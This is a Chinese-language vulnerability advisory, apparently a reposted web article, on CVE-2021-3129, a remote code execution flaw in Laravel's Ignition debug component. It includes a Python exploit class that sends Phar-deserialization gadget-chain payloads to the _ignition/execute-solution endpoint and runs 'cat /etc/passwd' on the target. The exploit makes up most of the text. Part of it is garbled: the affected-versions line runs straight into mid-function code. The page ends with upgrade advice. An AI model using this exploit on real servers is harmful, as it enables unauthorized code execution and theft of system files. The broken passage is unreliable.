远程代码执行漏洞Laravel Debug mode | 您所在的位置:网站首页 › phpggc › 远程代码执行漏洞Laravel Debug mode |
一、漏洞简介 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 二、影响版本Laravel = 0: return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)] else: return "[-] RCE echo is not found." def exp(self): for gadget_chain in self.__gadget_chains.keys(): print("[*] Try to use %s for exploitation." % (gadget_chain)) self.__clear_log() self.__clear_log() self.__payload_send('a' * 2) self.__payload_send(self.__gen_payload(gadget_chain)) self.__decode_log() print("[*] Result:") print(self.__rce()) def __init__(self, target, command): self.target = target self.__url = req.compat.urljoin(target, "_ignition/execute-solution") self.__command = self.__command_handler(command) if not self.__vul_check(): print("[-] [%s] is seems not vulnerable." % (self.target)) print("[*] You can also call obj.exp() to force an attack.") else: self.exp() def main(): Exp("http://127.0.0.1:8888", "cat /etc/passwd") if __name__ == '__main__': main() 四、安全建议建议将 Laravel 框架升级至8.4.3及以上版本,或将 Ignition组件升级至 2.5.2 及以上版本。 下载链接: https://laravel.com/docs/8.x#laravel-the-fullstack-framework 参考: https://mp.weixin.qq.com/s/ShRvF_YeV9JbJJnOUjklCw https://github.com/SNCKER/CVE-2021-3129 https://www.venustech.com.cn/new_type/aqtg/20210114/22299.html 文章来源:https://www.freebuf.com/vuls/262489.html |
CopyRight 2018-2019 实验室设备网 版权所有 |